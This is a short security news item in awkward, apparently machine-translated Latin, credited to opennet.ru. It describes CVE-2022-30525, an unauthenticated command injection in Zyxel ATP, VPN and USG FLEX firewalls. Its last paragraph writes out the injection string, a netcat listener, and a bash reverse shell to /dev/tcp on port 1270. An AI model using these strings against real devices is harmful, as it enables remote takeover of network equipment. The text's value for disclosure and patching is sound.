vulnerabilitas critica (CVE-2022-30525) in Zyxel inventa seriei ATP, VPN et USG FLEX notata est, quae ad operationem ignium murorum, IDS et VPN in conatibus ordinandam destinavit, quae permittit externum invasorem in codice exsequi. machinam sine iure usoris sine authenticas. Ad impetum faciendum, oppugnator petitiones mittere poterit protocollo HTTP/HTTPS fabrica. Zyxel vulnerabilitatem in ZLD 5.30 firmware renovationis fixit. Secundum officium Shodan, nunc sunt 16213 cogitationes vulnerabiles potentia in retis globalis quae petitiones accipiunt per HTTP/HTTPS.
Operatio exercetur mittendis mandatis specialiter designatis ad tracto /ztp/cgi-bin/stracto, pervia sine authenticitate. Problema causatur per defectum parametri propriae tersus petitionis cum mandata exequens in systemate os.systematis adhibito in bibliotheca lib_wan_settings.py adhibito, et exsecutioni operam dat in operatione setWanPortSt.
Verbi gratia, percussor chorda posset transire "; ping 192.168.1.210;" quae ad executionem "ping 192.168.1.210" in systematis mandato ducet. Ut accessum ad imperium testam recipias, "nc -lvnp 1270" in systemate tuo currere potes, ac deinde reversum nexum inchoare mittendo ad artificium cum "; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.
Source: opennet.ru